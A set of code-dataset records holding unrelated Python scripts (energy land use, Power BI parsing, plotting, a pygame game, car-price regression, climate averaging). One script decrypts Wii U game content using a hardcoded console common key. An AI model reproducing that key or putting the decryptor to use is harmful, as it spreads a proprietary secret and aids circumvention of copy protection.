share_from_pv / 100\n demand = pd.read_csv(path_to_demand, index_col=0)[\"demand_twh_per_year\"]\n potentials = pd.read_csv(path_to_potential, index_col=0)\n footprint = pd.read_csv(path_to_footprint, index_col=0)\n built_up_area = pd.read_csv(path_to_built_up_area, index_col=0)\n\n rooftop_pv = potentials[str(Potential.ROOFTOP_PV)].where(\n potentials[str(Potential.ROOFTOP_PV)] < share_from_pv * demand,\n share_from_pv * demand\n )\n demand_after_rooftops = demand - rooftop_pv\n assert (demand_after_rooftops >= 0).all()\n\n open_field_potential = potentials[str(Potential.ONSHORE_WIND)] + potentials[str(Potential.OPEN_FIELD_PV)]\n share_of_open_field_potential_necessary = demand_after_rooftops / open_field_potential\n open_field_footprint = footprint[Potential.ONSHORE_WIND.area_name] + footprint[Potential.OPEN_FIELD_PV.area_name]\n\n necessary_land = open_field_footprint * share_of_open_field_potential_necessary\n fraction_non_built_up_land = necessary_land / built_up_area[\"non_built_up_km2\"]\n # corner cases\n fraction_non_built_up_land[fraction_non_built_up_land > 1] = 1\n\n pd.DataFrame(\n index=fraction_non_built_up_land.index,\n data={\n \"fraction_non_built_up_land_necessary\": fraction_non_built_up_land,\n \"fraction_roofs_necessary\": rooftop_pv / potentials[str(Potential.ROOFTOP_PV)],\n \"rooftop_pv_generation_twh_per_year\": rooftop_pv\n }\n ).to_csv(\n path_to_output,\n index=True,\n header=True\n )\n\n\nif __name__ == \"__main__\":\n necessary_land()\n","sub_path":"src/necessary_land.py","file_name":"necessary_land.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"30780169","text":"#!/usr/bin/env python3\n\n# encrypted titlekey is decrypted with the Wii U Common Key\n# with IV being TID + 0x00 padding\n\n# contents are decrypted with the decrypted titlekey\n# with IV being all 0x00, or index bytes + 0x00 padding\n\nimport binascii\nimport glob\nimport itertools\nimport math\nimport os\nimport struct\nimport sys\nfrom Crypto.Cipher import AES\ntry:\n from Crypto.Hash import SHA1\nexcept ImportError:\n from Crypto.Hash import SHA\n SHA1 = SHA\n\n# put the common key here to decrypt things\nwiiu_common_key = \"D7B00402659BA2ABD2CB0DB27FA2B656\"\n\n##########################\n\nwiiu_common_key_hash = SHA1.new(wiiu_common_key.encode('utf-8').upper())\nif wiiu_common_key_hash.hexdigest() != 'e3fbc19d1306f6243afe852ab35ed9e1e4777d3a':\n sys.exit(\"Wrong Wii U Common Key. Place the correct one in the script.\")\n\nckey = binascii.unhexlify(wiiu_common_key)\n\nreadsize = 8 * 1024 * 1024\n\nif not os.path.isfile(\"title.tmd\"):\n sys.exit(\"No TMD (title.tmd) was found.\")\n\n\ndef show_progress(val, maxval):\n # crappy workaround I bet, but print() didn't do what I wanted\n minval = min(val, maxval)\n sys.stdout.write(\"\\r- {:>5.1f}% {:>10} / {}\".format((minval / maxval) * 100, minval, maxval))\n sys.stdout.flush()\n\n\ndef show_chunk(num, count):\n # crappy workaround I bet, but print() didn't do what I wanted\n sys.stdout.write(\"\\r- Chunk {:>5} / {:>5}\".format(num + 1, count))\n sys.stdout.flush()\n\n# find title id and content id\ntitle_id = b\"\"\ncontents = []\ncontent_count = 0\nwith open(glob.glob(\"title.tmd*\")[0], \"rb\") as tmd:\n tmd.seek(0x18C)\n title_id = tmd.read(0x8)\n tmd.seek(0x1DE)\n content_count = struct.unpack(\">H\", tmd.read(0x2))[0]\n tmd.seek(0x204)\n tmd_index = tmd.read(0x2)[::-1]\n for c in range(content_count):\n tmd.seek(0xB04 + (0x30 * c))\n content_id = binascii.hexlify(tmd.read(0x4)).decode('utf-8')\n tmd.seek(0xB08 + (0x30 * c))\n content_index = tmd.read(0x2)\n tmd.seek(0xB0A + (0x30 * c))\n content_type = struct.unpack(\">H\", tmd.read(0x2))[0]\n tmd.seek(0xB0C + (0x30 * c))\n content_size = struct.unpack(\">Q\", tmd.read(0x8))[0]\n # content_size = os.path.getsize(content_id)\n tmd.seek(0xB14 + (0x30 * c))\n content_hash = tmd.read(0x14)\n contents.append([content_id, content_index, content_type, content_size, content_hash])\n\nprint(\"Title ID: \" + binascii.hexlify(title_id).decode('utf-8').upper())\n\n# find encrypted titlekey\nencrypted_titlekey = b\"\"\nif os.path.isfile(\"title.tik\"):\n with open(\"title.tik\", \"rb\") as cetk:\n cetk.seek(0x1BF)\n encrypted_titlekey = cetk.read(0x10)\nelif len(sys.argv) > 1:\n encrypted_titlekey = binascii.unhexlify(sys.argv[1])\nelse:\n sys.exit(\"Missing CETK (title.tik). Please add an argument containing the encrypted titlekey.\")\n\nprint(\"Encrypted Titlekey: \" + binascii.hexlify(encrypted_titlekey).decode('utf-8').upper())\n\n# decryption fun\ncipher_titlekey = AES.new(ckey, AES.MODE_CBC, title_id + (b\"\\0\" * 8))\ndecrypted_titlekey = cipher_titlekey.decrypt(encrypted_titlekey)\nprint(\"Decrypted Titlekey: \" + binascii.hexlify(decrypted_titlekey).decode('utf-8').upper())\n\nfor c in contents:\n print(\"Decrypting {}...\".format(c[0]))\n left = os.path.getsize(c[0] + \".app\") # set to file size\n left_hash = c[3] # set to tmd size (can differ to filesize)\n\n if c[2] & 0x2: # if has a hash tree\n chunk_count = left // 0x10000\n chunk_num = 0\n with open(c[0] + \".h3\", \"rb\") as h3:\n h3_hashes = h3.read()\n if SHA1.new(h3_hashes).digest() == c[4]:\n print(\"H3 Hash valid\")\n else:\n print(\"H3 Hash mismatch!\")\n print(\" > TMD: \" + binascii.hexlify(c[4]).decode('utf-8').upper())\n print(\" > Result: \" + content_hash.hexdigest().upper())\n print(\"Chunks: {}\".format(chunk_count))\n h0_hash_num = 0\n h1_hash_num = 0\n h2_hash_num = 0\n h3_hash_num = 0\n with open(c[0] + \".app\", \"rb\") as encrypted:\n with open(c[0] + \".app.dec\", \"wb\") as decrypted:\n for chunk_num in range(chunk_count):\n show_chunk(chunk_num, chunk_count)\n # decrypt and verify hash tree\n cipher_hash_tree = AES.new(decrypted_titlekey, AES.MODE_CBC, (b\"\\0\" * 16))\n hash_tree = cipher_hash_tree.decrypt(encrypted.read(0x400))\n h0_hashes = hash_tree[0:0x140]\n h1_hashes = hash_tree[0x140:0x280]\n h2_hashes = hash_tree[0x280:0x3c0]\n h0_hash = h0_hashes[(h0_hash_num * 0x14):((h0_hash_num + 1) * 0x14)]\n h1_hash = h1_hashes[(h1_hash_num * 0x14):((h1_hash_num + 1) * 0x14)]\n h2_hash = h2_hashes[(h2_hash_num * 0x14):((h2_hash_num + 1) * 0x14)]\n h3_hash = h3_hashes[(h3_hash_num * 0x14):((h3_hash_num + 1) * 0x14)]\n if SHA1.new(h0_hashes).digest() != h1_hash:\n print(\"\\rH0 Hashes invalid in chunk {}\".format(chunk_num))\n if SHA1.new(h1_hashes).digest() != h2_hash:\n print(\"\\rH1 Hashes invalid in chunk {}\".format(chunk_num))\n if SHA1.new(h2_hashes).digest() != h3_hash:\n print(\"\\rH2 Hashes invalid in chunk {}\".format(chunk_num))\n # doesn't feel right, but only way for a long number I know of\n iv = int.from_bytes(h0_hash, byteorder='big') // 0x100000000\n #print(\"{:0>32X}\".format(iv))\n cipher_content = AES.new(decrypted_titlekey, AES.MODE_CBC, binascii.unhexlify(\"{:0>32X}\".format(iv)))\n decrypted_data = cipher_content.decrypt(encrypted.read(0xFC00))\n if SHA1.new(decrypted_data).digest() != h0_hash:\n print(\"\\rData block hash invalid in chunk {}\".format(chunk_num))\n decrypted.write(hash_tree + decrypted_data)\n h0_hash_num += 1\n if h0_hash_num >= 16:\n h0_hash_num = 0\n h1_hash_num += 1\n if h1_hash_num >= 16:\n h1_hash_num = 0\n h2_hash_num += 1\n if h2_hash_num >= 16:\n h2_hash_num = 0\n h3_hash_num += 1\n print(\"\")\n else:\n cipher_content = AES.new(decrypted_titlekey, AES.MODE_CBC, c[1] + (b\"\\0\" * 14))\n content_hash = SHA1.new()\n with open(c[0] + \".app\", \"rb\") as encrypted:\n with open(c[0] + \".app.dec\", \"wb\") as decrypted:\n for __ in range(int(math.floor((c[3] / readsize)) + 1)):\n to_read = min(readsize, left)\n to_read_hash = min(readsize, left_hash)\n encrypted_content = encrypted.read(to_read)\n decrypted_content = cipher_content.decrypt(encrypted_content)\n content_hash.update(decrypted_content[0:to_read_hash])\n decrypted.write(decrypted_content)\n left -= readsize\n left_hash -= readsize\n show_progress(c[3] - left, c[3])\n if left_hash < 0:\n left_hash = 0\n if left <= 0:\n print(\"\")\n break\n if c[4] == content_hash.digest():\n print(\"Content Hash valid\")\n else:\n print(\"Content Hash mismatch!\")\n print(\" > TMD: \" + binascii.hexlify(c[4]).decode('utf-8').upper())\n print(\" > Result: \" + content_hash.hexdigest().upper())\n","sub_path":"wiiu_decrypt.py","file_name":"wiiu_decrypt.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463977873","text":"\r\nimport json\r\nimport sys\r\nimport os\r\nimport argparse\r\n\r\nimport os.path\r\n\r\n\r\n\r\n\r\n\r\ndef parseArguments():\r\n\r\n try:\r\n \r\n parser = argparse.ArgumentParser(description='Parses report refresh history and returns ok if last refresh successfull') \r\n parser.add_argument(\"-d\",\"--dataSetId\", help=\"Enter dataset id of a report\", required=True)\r\n \r\n args = parser.parse_args()\r\n \r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n parser.exit(1)\r\n\r\n return args\r\n \r\n except:\r\n\r\n #print('Problem @parseArguments')\r\n #print(sys.exc_info())\r\n sys.exit(1)\r\n\r\n \r\njson_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\\\\afa54983-da95-4e05-96db-9a7e664c6310\"\r\n#json_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\\\\\"\r\nlastId_file_path = \"D:\\\\Reporting\\\\OutputFiles\\\\PBIRefresh\"\r\n\r\nwith open(json_file_path,encoding='utf-16', errors='ignore') as histFile:\r\n myDict = json.loads(histFile.read())\r\n #myDict = json.load(histFile, strict=False)\r\n\r\n\r\n'''\r\n 1. read in lastId file & compare with latest json id\r\n if latest json id is greater than lastId -> check if status completed\r\n if true then report \"refresh successfull\"\r\n 2. save latest json id into lastId file & quit\r\n\r\n if lastId file not exists then check \r\n \r\n'''\r\n\r\n#print(myDict)\r\n'''\r\nprint(\"\")\r\nprint(myDict['value'])\r\nprint(\"\")\r\n'''\r\nprint(myDict['value'][0])\r\nprint(\"\")\r\nprint(myDict['value'][0]['id'])\r\n\r\nif myDict['value'][0]['status'] == \"Completed\" and myDict['value'][0]['refreshType'] == 'ViaApi':\r\n print(\"all ok\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n myargs = parseArguments()\r\n print(myargs.dataSetId)\r\n\r\n #os.path.isfile(fname) \r\n\r\n","sub_path":"PBIRefreshHistParser/backup/pbiRefreshHistParser - Copy (2).py","file_name":"pbiRefreshHistParser - Copy (2).py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"238915842","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: mwoods\n#\n# Created: 28/10/2013\n# Copyright: (c) mwoods 2013\n# Licence: \n#-------------------------------------------------------------------------------\n\n\nimport GeoHandler as geo\nimport numpy as np\nimport json\nimport util\n\n\n\n\nclass BuildCustomerNet:\n def __init__(self, acct):\n self.acct = acct\n self.customer_data = self._get_customer_data()\n self.fsl_meta = self._get_fsl_meta()\n\n def _get_customer_data(self):\n val = util.get_customer_net()\n return val.get(self.acct, None)\n\n def _get_fsl_meta(self):\n fsl_meta = util.get_fsl_meta_data_from_memory()\n if self.customer_data != None:\n return {k: fsl_meta[k] for k in self.customer_data['fsl_list']}\n\n def get_fsl_summary(self):\n summary_data = self.customer_data['summary']\n temp = {}\n for fsl, item in summary_data:\n temp.setdefault(fsl, {'geopt':set([]),\n 'cont_amt':0,\n 'cont_qty':0})\n temp[fsl]['geopt'].update(summary_data[(fsl, item)]['geopt'])\n temp[fsl]['cont_amt'] += summary_data[(fsl, item)]['cont_amt']\n temp[fsl]['cont_qty'] += summary_data[(fsl, item)]['cont_qty']\n return temp\n\n def get_plot(self):\n\n if self.customer_data == None:\n return json.dumps([]), json.dumps([])\n\n customer_locations = []\n fsl_locations = []\n summary_data = self.get_fsl_summary()\n\n for fsl in summary_data:\n c = util.assign_color()\n #c = \"green\"\n fsl_dict = self.fsl_meta[fsl]\n geopt = fsl_dict['geopt']\n if geopt != None:\n lat,lng = geo.latLngStringToFloat(geopt)\n fsl_locations.append([fsl, lat, lng, c])\n\n for geopt in summary_data[fsl]['geopt']:\n #c = \"red\"\n geopt_float = geo.latLngStringToFloat(geopt)\n if geopt_float != None:\n lat,lng = geopt_float\n customer_locations.append([self.customer_data['customer_name'], lat, lng, c])\n\n if customer_locations != []:\n customer_locations = np.array(customer_locations)\n customer_locations[:,1] = util.jitter_array(customer_locations[:,1])\n customer_locations[:,2] = util.jitter_array(customer_locations[:,2])\n customer_locations = customer_locations.tolist()\n return json.dumps(fsl_locations), json.dumps(customer_locations)\n\n def get_fsl_summary_table(self):\n if self.customer_data == None:\n return []\n\n\n summary = self.get_fsl_summary()\n\n out = []\n\n for fsl in self.customer_data['fsl_list']:\n out.append(['{0}'.format(fsl), self.fsl_meta[fsl]['country_code'], summary[fsl]['cont_amt'], len(summary[fsl]['geopt'])])\n out = np.array(out).astype('object')\n out = out[np.argsort(out[:,2].astype('f8'))[::-1]]\n\n header = ['FSL', 'Country', 'Cont Amt', 'Unique Locs']\n out = util.convert_array_to_html_table(out, header)\n return out\n\n def get_item_table(self):\n if self.customer_data == None:\n return []\n\n summary_dict = self.customer_data['summary']\n\n out = np.array([[fsl, item,\n summary_dict[(fsl, item)]['cont_amt'],\n summary_dict[(fsl, item)]['cont_qty']] for fsl,item in summary_dict])\n\n header = ['FSL', 'Item', 'Cont Amt', 'Cont Qty']\n total = ['Grand Total', '', np.sum(out[:,2].astype('f8')), np.sum(out[:,3].astype('f8'))]\n return util.convert_array_to_html_table(out, header, total)\n\n def summary(self):\n summary_data = {'cont_amt':0, 'customer_name':'', 'fsl_ct':0, 'cust_sites':0}\n\n if self.customer_data != None:\n summary_data['cont_amt'] = self.customer_data['cont_amt']\n summary_data['customer_name'] = self.customer_data['customer_name']\n summary_data['fsl_ct'] = len(self.customer_data['fsl_list'])\n summary_data['cust_sites'] = len(self.customer_data['geopt'])\n return summary_data\n\n\n\nif __name__==\"__main__\":\n from FileIO import Data_Connections\n\n #D = get_data_from_mem()\n #D.run_default2(dev = True)\n\n t = 'BELKCORP'\n\n cn = BuildCustomerNet(t)\n cn.summary()\n cn.get_plot()\n cn.get_item_table()\n cn.get_fsl_summary_table()\n\n","sub_path":"prism/CustomerDataModel.py","file_name":"CustomerDataModel.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184765208","text":"import pygame, random, sys\nfrom pygame.locals import *\n\nclass Commands:\n\n def __init__(self):\n self.move = {\n 'left': False,\n 'right': False,\n 'up': False,\n 'down': False,\n }\n\n def terminate(self):\n pygame.quit()\n sys.exit()\n\n def waitForPlayerToPressKey(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE: # pressing escape quits\n terminate()\n return\n\n def controls(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n\n if event.type == KEYDOWN:\n if event.key == ord('z'):\n reverseCheat = True\n if event.key == ord('x'):\n slowCheat = True\n if event.key == K_LEFT or event.key == ord('a'):\n self.move[\"right\"] = False\n self.move[\"left\"] = True\n if event.key == K_RIGHT or event.key == ord('d'):\n self.move[\"left\"] = False\n self.move[\"right\"] = True\n if event.key == K_UP or event.key == ord('w'):\n self.move[\"down\"] = False\n self.move[\"up\"] = True\n if event.key == K_DOWN or event.key == ord('s'):\n self.move[\"up\"] = False\n self.move[\"down\"] = True\n\n if event.type == KEYUP:\n if event.key == ord('z'):\n reverseCheat = False\n score = 0\n if event.key == ord('x'):\n slowCheat = False\n score = 0\n if event.key == K_ESCAPE:\n terminate()\n\n if event.key == K_LEFT or event.key == ord('a'):\n self.move[\"left\"] = False\n if event.key == K_RIGHT or event.key == ord('d'):\n self.move[\"right\"] = False\n if event.key == K_UP or event.key == ord('w'):\n self.move[\"up\"] = False\n if event.key == K_DOWN or event.key == ord('s'):\n self.move[\"down\"] = False\n\n\n if event.type == MOUSEMOTION:\n playerRect.move_ip(event.pos[0] - playerRect.centerx, event.pos[1] - playerRect.centery)\n","sub_path":"learn/pyGame/dodger/myOne/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624762108","text":"import numpy as np\nimport pandas as pd\nimport warnings\nfrom sklearn.ensemble import RandomForestRegressor\n#from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import r2_score\nimport pickle\nwarnings.filterwarnings('ignore')\n\ndf = pd.read_csv(r'C:\\Users\\chandu\\Documents\\Board Infinity\\Machine Learning\\Projects\\Capstone Project-2 (Old car price prediction)\\car-data.csv')\n\ndf= df.drop_duplicates()\n\ndf['year'] = 2021 - df['year']\n\ndf.rename(columns = {'year':'age_of_car'}, inplace = True)\n\ndf = df.replace({'Automatic': 0, 'Manual': 1, 'Semi-Auto': 2})\n\ndf = df.replace({'Diesel': 0, 'Petrol': 1, 'Hybrid': 2, 'Other': 3})\n\nx = df[df.engineSize == 0].index\ndf = df.drop(labels=x, axis =0)\n\nX = df[['age_of_car','transmission','mileage','fuelType','tax','mpg','engineSize']]\ny = df['price']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state = 42)\n\n\n# ## RandomForestRegressor\n\nreg_rf = RandomForestRegressor()\nreg_rf.fit(X_train, y_train)\ny_pred = reg_rf.predict(X_test)\n\nprint('MAE:', metrics.mean_absolute_error(y_test, y_pred))\nprint('MSE:', metrics.mean_squared_error(y_test, y_pred))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\n\nr2_score(y_test,y_pred)\n\nr2 = (r2_score(y_test, y_pred))\nn = X_test.shape[0] # Number of rows in out test data\np = X_test.shape[1] # Number of features in our data\nadj_r2 = 1 - (((1-r2)*(n-1))/(n-p-1))\nprint(\"Adjusted R2 Error:\", adj_r2)\n\n# ## XGBRegressor\n\n# XGB = XGBRegressor()\n# XGB.fit(X_train, y_train)\n# y_pred = XGB.predict(X_test)\n\n# print('MAE:', metrics.mean_absolute_error(y_test, y_pred))\n# print('MSE:', metrics.mean_squared_error(y_test, y_pred))\n# print('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))\n\n# r2 = (r2_score(y_test, y_pred))\n# n = X_test.shape[0] # Number of rows in out test data\n# p = X_test.shape[1] # Number of features in our data\n# adj_r2 = 1 - (((1-r2)*(n-1))/(n-p-1))\n# print(\"Adjusted R2 Error:\", adj_r2)\n\nf = open('reg_rf.pickle', 'wb')\npickle.dump(reg_rf, f)\nf.close()\n\n\n# f = open('XGB.pickle', 'wb')\n# pickle.dump(reg_rf, f)\n# f.close()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"197563651","text":"#! /usr/bin/python\n\nimport os\nimport numpy as np\nimport calcos\nfrom astropy.io import fits\nfrom costools import x1dcorr\nimport glob\nfrom matplotlib import pyplot as plt\nplt.style.use(['seaborn-muted'])\nfrom stsci.convolve import boxcar\nfrom functools import partial\nimport multiprocessing as mp\nimport argparse\n#%config Inline.Backend.figure_format='retina'\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nrootdir = '/user/esnyder/newnuvproj/'\ngroupdir = '/grp/hst/cos2/nuvboxheight/'\nsubdirlist = ['cycle23', 'cycle18', 'cycle19', 'cycle20', 'cycle21', 'cycle22', 'cycle17', 'faint_11667', 'faint_13846', 'smov4bright', 'faint_13398', 'faint_14265']\nbinninglist = ['7', '13', '17', '23', '27', '33', '37', '43', '47', '53', '57']\n\n\nfor folder in subdirlist:\n filebases = glob.glob(os.path.join(groupdir, folder, '7', '*_flt.fits'))\n for filebase in filebases:\n filename = filebase.split('/')[-1]\n filestoplot = glob.glob(os.path.join(groupdir, folder, '*', filename))\n refspecfiles = glob.glob(os.path.join(groupdir, folder, '*', filename.split('_')[0] + '_x1d.fits'))\n if refspecfiles == []: continue\n if os.path.isfile(os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf')):\n os.system('rm ' + os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf'))\n with PdfPages(os.path.join(groupdir, folder, filename.split('.')[0] + '_fltimageplot.pdf')) as pdf:\n \n for plottingfile,refspecfile in zip(filestoplot,refspecfiles):\n \n num = plottingfile.split('/')[-2]\n \n # pull out header keywords #\n \n obj = fits.getval(refspecfile, 'targname', ext=0)\n opt_elem = fits.getval(refspecfile, 'opt_elem', ext=0)\n cenwave = fits.getval(refspecfile, 'cenwave', ext=0)\n aper = fits.getval(refspecfile, 'aperture', ext=0)\n slopeA = fits.getval(refspecfile, 'SP_SLP_A', ext=1)\n slopeB = fits.getval(refspecfile, 'SP_SLP_B', ext=1)\n slopeC = fits.getval(refspecfile, 'SP_SLP_C', ext=1)\n asn = fits.getval(refspecfile, 'ASN_ID', ext=0)\n \n # open xtractab file #\n \n tab = fits.open('/user/esnyder/bewnuvproj/newx1dfiles/w5g1439sl_' + num + '.fits')\n tabdata = tab[1].data\n stripeind = np.where((tabdata['OPT_ELEM'] == opt_elem) & (tabdata['CENWAVE'] == cenwave) & (tabdata['APERTURE'] == aper))\n\n # open the left side plot # \n \n fig = plt.figure(figsize=(15,8))\n axl = fig.add_axes([0.08,0.08,0.6,0.85])\n \n # open the flat image and plot it #\n \n spec = fits.open(plottingfile)\n axl.imshow(spec[1].data, cmap = plt.get_cmap('gist_yarg'), aspect = 'auto')\n\n # get box info and add to left side plot #\n \n a_center = tabdata[stripeind[0][0]]['B_SPEC']\n b_center = tabdata[stripeind[0][1]]['B_SPEC']\n c_center = tabdata[stripeind[0][2]]['B_SPEC']\n\n a_height, b_height, c_height = float(num), float(num), float(num)\n\n x_pixels = np.arange(1500)\n y_pixels = np.zeros(1500)\n\n #slope = (415.27 - 420.7) / (1149.1 - 126.3)\n aveAtop = np.mean((x_pixels * slopeA) + (a_center + a_height/2.))\n aveAbot = np.mean((x_pixels * slopeA) + (a_center - a_height/2.))\n aveBtop = np.mean((x_pixels * slopeB) + (b_center + b_height/2.))\n aveBbot = np.mean((x_pixels * slopeB) + (b_center - b_height/2.))\n aveCtop = np.mean((x_pixels * slopeC) + (c_center + c_height/2.))\n aveCbot = np.mean((x_pixels * slopeC) + (c_center - c_height/2.))\n \n boundsA57 = [int(a_center - 57./2.), int(a_center + 57./2.)]\n boundsB57 = [int(b_center - 57./2.), int(b_center + 57./2.)]\n boundsC57 = [int(c_center - 57./2.), int(c_center + 57./2.)]\n \n boundsA = [int(a_center - a_height/2.), int(a_center + a_height/2.)]\n boundsB = [int(b_center - b_height/2.), int(b_center + b_height/2.)]\n boundsC = [int(c_center - c_height/2.), int(c_center + c_height/2.)]\n\n axl.plot(x_pixels, (x_pixels * slopeA) + boundsA[1], color = 'red', label='Stripe A')\n axl.plot(x_pixels, (x_pixels * slopeA) + boundsA[0], color = 'red')\n axl.plot(x_pixels, (x_pixels * slopeB) + boundsB[1], color = 'blue', label = 'Stripe B')\n axl.plot(x_pixels, (x_pixels * slopeB) + boundsB[0], color = 'blue')\n axl.plot(x_pixels, (x_pixels * slopeC) + boundsC[1], color = 'green', label = 'Stripe C')\n axl.plot(x_pixels, (x_pixels * slopeC) + boundsC[0], color = 'green')\n\n # flatten the spectra and add to right side plot #\n\n flattenx = np.sum(spec[1].data,axis=1)\n fakeaxis = np.arange(0,1024)\n\n axr = fig.add_axes([0.75,0.08,0.20,0.85])\n\n axr.plot(flattenx,fakeaxis,color='black')\n axr.plot([0,1200],[boundsA57[0]-2.,boundsA57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsB57[0]-2.,boundsB57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsC57[0]-2.,boundsC57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsA57[1]-2.,boundsA57[1]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsB57[1]-2.,boundsB57[1]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsC57[1]-2.,boundsC57[1]-2.],ls='dashed',color='gray')\n\n axr.plot([0,1200],[boundsA[0]-2.,boundsA[0]-2.],color='red')\n axr.plot([0,1200],[boundsA[1]-2.,boundsA[1]-2.],color='red')\n axr.plot([0,1200],[boundsB[0]-2.,boundsB[0]-2.],color='blue')\n axr.plot([0,1200],[boundsB[1]-2.,boundsB[1]-2.],color='blue')\n axr.plot([0,1200],[boundsC[0]-2.,boundsC[0]-2.],color='green')\n axr.plot([0,1200],[boundsC[1]-2.,boundsC[1]-2.],color='green')\n \n # calculate the flux being lost and add text to plot # \n totsumA = np.median(flattenx[boundsA57[0]:boundsA57[1]])\n totsumB = np.median(flattenx[boundsB57[0]:boundsB57[1]])\n totsumC = np.median(flattenx[boundsC57[0]:boundsC57[1]])\n \n inboxA = np.median(flattenx[boundsA[0]:boundsA[1]])\n inboxB = np.median(flattenx[boundsB[0]:boundsB[1]])\n inboxC = np.median(flattenx[boundsC[0]:boundsC[1]])\n \n lossA = np.abs(totsumA - inboxA) / totsumA * 100\n lossB = np.abs(totsumB - inboxB) / totsumB * 100\n lossC = np.abs(totsumC - inboxC) / totsumC * 100\n \n axr.text(0.5, 0.70, 'stripe C loss = ' + '{:.2f}'.format(lossC) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n axr.text(0.5, 0.35, 'stripe B loss = ' + '{:.2f}'.format(lossB) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n axr.text(0.5, 0.08, 'stripe A loss = ' + '{:.2f}'.format(lossA) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n\n # finish up the axes labels, etc. #\n\n axl.set_xlabel('X FULL',fontsize=18)\n axl.set_ylabel('Y FULL',fontsize=18)\n axl.set_xlim([0,1200])\n axl.set_ylim([100,500])\n for tick in axl.xaxis.get_major_ticks():\n tick.label.set_fontsize(14)\n for tick in axl.yaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n for axis in ['top','bottom','left','right']:\n axl.spines[axis].set_linewidth(2)\n axl.set_xlabel('X FULL',fontsize=18)\n axr.set_xlabel('Flux [counts/sec]',fontsize=18)\n axr.set_ylabel('Y FULL',fontsize=18)\n axr.set_ylim([100,500])\n if 'faint' in folder:\n upperxlim = max(flattenx) + 10.\n else: \n upperxlim = max(flattenx) + 100.\n axr.set_xlim([0,upperxlim])\n for tick in axr.xaxis.get_major_ticks():\n tick.label.set_fontsize(14)\n for tick in axr.yaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n for axis in ['top','bottom','left','right']:\n axr.spines[axis].set_linewidth(2)\n axl.set_title(asn + ' ' + obj + '- h = ' + str(num) + ' - ' + opt_elem + ' - ' + str(cenwave) + 'A',fontsize=18)\n axr.set_title('sum of x axis')\n pdf.savefig()\n plt.close()\n print(folder)\n\n","sub_path":"makefltplots.py","file_name":"makefltplots.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"17366622","text":"import re\r\n\r\ndef chunks(l, n):\r\n #Generator to yield n sized chunks from l\r\n for i in range(0, len(l), n):\r\n yield l[i: i + n]\r\n\r\nitems = []\r\nfile=\"C:/aaNeil/CET/cetdl.dat\"\r\n\r\nstrToWrite='dateString,tmin,tmax,precip\\n'\r\nclimFile = open(\"C:/aaNeil/CET/cet_tempprecip.csv\", 'r').readlines()\r\n\r\ncnt=0\r\nlag=7\r\n\r\nfor entry in climFile:\r\n\r\n if (cnt>lag):\r\n tminTot=0\r\n tmaxTot=0\r\n precipTot=0\r\n\r\n date=climFile[cnt].strip().split(\",\")[0]\r\n for day in range(0, lag-1):\r\n\r\n tmin=float(climFile[cnt-day].strip().split(\",\")[1])\r\n tmax=float(climFile[cnt-day].strip().split(\",\")[2])\r\n precip=float(climFile[cnt-day].strip().split(\",\")[3])\r\n\r\n if (tmin > -40):\r\n tminTot=tminTot+tmin\r\n tmaxTot=tmaxTot+tmax\r\n precipTot=precipTot+precip\r\n tminAve=round(tminTot/lag,1)\r\n tmaxAve=round(tmaxTot/lag,1)\r\n precipAve=round(precipTot/lag,1)\r\n\r\n if (precipAve<0):\r\n precipAve=-999\r\n \r\n strToWrite=strToWrite+ date + \",\" + str(tminAve) + \",\" + str(tmaxAve) + \",\" + str(precipAve) + \"\\n\"\r\n \r\n cnt=cnt+1\r\n\r\nwith open(\"C:/Apache/HTTP Server 2.2/htdocs/climviz/cet_v1/cetdaily_data/CE\"+str(lag)+\"DayLag.csv\", \"w\") as text_file:\r\n text_file.write(strToWrite)\r\n","sub_path":"Scripts/Python/CET/create30DayLag.py","file_name":"create30DayLag.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 